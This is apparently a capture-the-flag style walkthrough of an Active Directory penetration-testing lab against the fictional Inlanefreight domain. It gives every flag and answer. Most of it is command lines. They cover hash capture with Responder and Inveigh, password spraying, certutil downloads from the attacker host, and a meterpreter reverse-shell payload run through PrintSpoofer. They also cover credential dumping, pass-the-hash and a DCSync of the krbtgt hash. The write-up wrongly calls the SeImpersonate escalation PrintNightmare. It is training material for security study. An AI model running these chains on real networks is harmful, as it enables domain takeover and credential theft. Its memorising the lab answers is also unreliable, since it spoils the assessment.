AD Enumeration & Attacks - Skills Assessment Part II

Scenario

Our client Inlanefreight has contracted us again to perform a full-scope internal penetration test. The client is looking to find and remediate as many flaws as possible before going through a merger & acquisition process. The new CISO is particularly worried about more nuanced AD security flaws that may have gone unnoticed during previous penetration tests. The client is not concerned about stealth/evasive tactics and has also provided us with a Parrot Linux VM within the internal network to get the best possible coverage of all angles of the network and the Active Directory environment. Connect to the internal attack host via SSH (you can also connect to it using xfreerdp as shown in the beginning of this module) and begin looking for a foothold into the domain. Once you have a foothold, enumerate the domain and look for flaws that can be utilized to move laterally, escalate privileges, and achieve domain compromise.

Q1) Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain. What is the account name?

Let's begin with starting responder with the default settings

sudo responder -I ens224

Let's review the Responder logs to determine if any hashes were captured.

cat /usr/share/responder/logs/SMB-NTLMv2-SSP-172.16.7.3.txt

Answer: AB920

Q2) What is this user's cleartext password?

Let's save the hash to a file and attempt to crack it using Hashcat in order to retrieve the plaintext password.

hashcat -m 5600 ab920_hash /usr/share/wordlists/rockyou.txt

Answer: weasal

Q3) Submit the contents of the C:\flag.txt file on MS01.

Let's check which hosts are alive in the domain first

fping -asgq 172.16.7.0/23

Let's save these IP addresses to a file and use Nmap to enumerate them, identifying which one corresponds to MS01.

sudo nmap -v -A -iL hosts.txt
  • 172.16.7.3: DC01

  • 172.16.7.50: MS01

  • 172.16.7.60: SQL01

  • 172.16.7.240: Our Parrot machine

Let's verify whether the user ab920 can log in to 172.16.7.50, and determine which authentication protocol is supported for the connection.

crackmapexec smb 172.16.7.50 -u 'ab920' -p 'weasal'
crackmapexec winrm 172.16.7.50 -u 'ab920' -p 'weasal'

Let's use Evil-WinRM to authenticate with the ab920 account.

evil-winrm -i 172.16.7.50 -u 'ab920' -p 'weasal'

Answer: aud1t_gr0up_m3mbersh1ps!

Q4) Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

It is now time to create a list of target users to be used in the upcoming password spraying attack.

sudo crackmapexec smb 172.16.7.3 -u 'ab920' -p 'weasal' --users | tee  usernames.txt
cat usernames.txt | cut -d'\' -f2 | awk -F " " '{print $1}' | tee valid_users.txt

We now have 2,904 valid usernames in the domain. Let's now proceed with the password spraying attack.

kerbrute passwordspray -d inlanefreight.local --dc 172.16.7.3 valid_users.txt Welcome1

Answer: BR086

Q5) What is this user's password?

Answer: Welcome1

Q6) Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?

Let's perform share enumeration to identify any shared resources on which we may have read access.

smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3

I found a shared folder named 'Department Shares' to which we have read access. Let's proceed to review its contents.

smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R 'Department Shares'

I found a file named web.config in the results. Let's review its contents to identify any relevant information.

smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R 'Department Shares' -A web.config

Answer: D@ta_bAse_adm1n!

Q7) Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

Next, we will use the obtained credentials to authenticate to SQL01 via mssqlclient.

python3 /usr/local/bin/mssqlclient.py inlanefreight/netdb:'D@ta_bAse_adm1n!'@172.16.7.60

We have successfully accessed SQL01; however, we do not have the necessary permissions to read the flag. Let's review our current permissions.

EXEC xp_cmdshell 'whoami /priv'

We have the SeImpersonatePrivilege enabled, which can be leveraged for privilege escalation by exploiting the PrintNightmare vulnerability.

Let's generate a payload using msfvenom, and also obtain PrintSpoofer.exe. We will download both files to the SQL01 server.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.7.240 LPORT=1335 -f exe -o shell.exe

Next, let's downlaod the two files onto the sql server

xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240:8000/PrintSpoofer.exe C:\Users\Public\PrintSpoofer.exe"
xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240:8000/shell.exe C:\Users\Public\shell.exe"

Let's initiate the Meterpreter listener and proceed with the privilege escalation attack.

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 172.16.7.240
set LPORT 1335
xp_cmdshell C:\Users\Public\PrintSpoofer.exe -c C:\Users\Public\shell.exe

It is now time to retrieve the flag.

more C:\Users\administrator\Desktop\flag.txt

Answer: s3imp3rs0nate_cl@ssic

Q8) Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

We now have system-level privileges on the SQL01 server; the next step is to attempt to retrieve the administrator's hash.

load kiwi
lsa_dump_creds

Next, we will use this hash to attempt a connection to the MS01 server.

evil-winrm -i 172.16.7.50 -u administrator -H bdaffbfe64f1fc646a3353be1c2c3c99

Answer: exc3ss1ve_adm1n_r1ights!

Q9) Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?

Let's proceed to download PowerView.ps1 on MS01 to enumerate Access Control Lists (ACLs).

certutil.exe -urlcache -f http://172.16.7.240:8000/PowerView.ps1 .\PowerView.ps1
Import-Module .\PowerView.ps1
Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUID

I encountered an error while attempting this, so let's proceed using our Meterpreter session instead.

use exploit/windows/smb/psexec
set lhost 172.16.7.240
set rhosts 172.16.7.50
set smbuser administrator
set smbpass 00000000000000000000000000000000:bdaffbfe64f1fc646a3353be1c2c3c99
exploit
Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUID

Let's apply a filter for the GenericAll permission.

Get-DomainObjectAcl -Identity "S-1-5-21-3327542485-274640656-2609762496-512" -ResolveGUID

Next, let'sconvert the security identifier (SID) to a username to identify the associated user.

Convert-SidtoName "S-1-5-21-3327542485-274640656-2609762496-4611"

Answer: CT059

Q10) Crack this user's password hash and submit the cleartext password as your answer.

For this task, we will use Inveigh on MS01 to conduct a man-in-the-middle attack in an attempt to capture the NTLM hash of the target user.

certutil.exe -urlcache -f http://172.16.7.240:8000/Inveigh.ps1 .\Inveigh.ps1
Import-Module .\Inveigh.ps1
Invoke-Inveigh -NBNS Y LLMNR Y -ConsoleOutput Y -FileOutput Y

Let's save this to a file and attempt to crack it using Hashcat.

hashcat -m 5600 CT059_hash /usr/share/wordlists/rockyou.txt

Answer: charlie1

Q11) Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

The user CT059 now has the GenericAll permission. Therefore, we can proceed to add this user to the Domain Admins group and initiate a DCSync attack.

Let's configure the proxychains configuration file (/etc/proxychains.conf) on the Parrot host to route traffic through a SOCKS4 proxy on port 9050. This setup will allow us to authenticate to the MS01 machine via RDP using the credentials of the user CT059.

sudo nano /etc/proxychains.conf

Next, establish an SSH connection and create a SOCKS proxy on local port 9050.

ssh -D 9050 htb-student@10.129.221.33

Let's now authenticate to the MS01 server via RDP using the credentials of user CT059.

proxychains xfreerdp /v:172.16.7.50 /u:CT059 /p:charlie1 /d:inlanefreight.local /dynamic-resolution /drive:Shared,//home/htb-ac-1224655/

Let's proceed to add this account to the Domain Admins group.

net group 'Domain Admins' ct059 /add /domain

It is now time to migrate to DC01.

$cred = New-Object System.Management.Automation.PSCredential("INLANEFREIGHT\CT059", (ConvertTo-SecureString "charlie1" -AsPlainText -Force))
Enter-PSSession -ComputerName DC01 -Credential $cred

Answer: acLs_f0r_th3_w1n!

Q12) Submit the NTLM hash for the KRBTGT account for the target domain after achieving domain compromise.

Now, let's authenticate to DC01 and execute a DCSync attack.

psexec.py inlanefreight.local/CT059:charlie1@172.16.7.3
lsadump::dcsync /user:inlanefreight\krbtgt

Answer: 7eba70412d81c1cd030d72a3e8dbe05f

Last updated